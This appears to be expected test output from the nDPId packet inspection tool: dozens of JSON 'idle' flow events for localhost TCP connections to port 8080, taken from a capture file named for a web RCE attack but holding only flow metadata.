+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 